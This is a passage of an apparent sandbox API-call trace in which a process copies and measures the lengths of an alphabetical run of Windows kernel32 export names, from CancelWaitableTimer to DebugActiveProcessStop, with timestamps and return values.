lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.776] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.776] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.777] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.777] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.777] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.777] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.777] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.777] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.777] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.777] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.777] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.777] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.777] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.777] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.777] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.777] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.777] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.777] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.777] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.777] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.777] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.778] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.778] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.778] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.778] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.778] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.778] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.778] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.778] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.778] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.778] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.778] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.778] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.778] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.778] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.778] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.778] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.778] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.778] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.778] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.779] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.779] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.779] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.779] lstrlenA (lpString="COPYFILEA") returned 9 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.779] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.779] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.779] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.779] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.779] lstrlenA (lpString="COPYFILEW") returned 9 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.779] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.779] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.779] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.779] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.779] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.779] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.779] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.779] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.779] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.779] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.780] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.780] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.780] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.780] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.780] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.780] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.780] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.780] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.780] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.780] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.780] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.780] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.780] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.780] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.780] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.780] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.780] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.780] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.780] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.781] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.781] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.781] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.781] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.781] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.781] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.781] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.781] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.781] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.781] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.781] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.781] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.781] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.781] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.781] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.781] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.781] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.781] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.781] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.782] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.782] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.782] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.782] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.782] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.782] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.782] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.782] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.782] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.782] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.782] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.782] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.782] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.782] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.782] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.782] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.782] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.782] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.782] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.783] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.783] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.783] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.783] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.783] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.783] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.783] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.783] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.783] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.783] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.783] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.783] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.783] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.783] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.783] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.783] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.783] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.783] lstrlenA 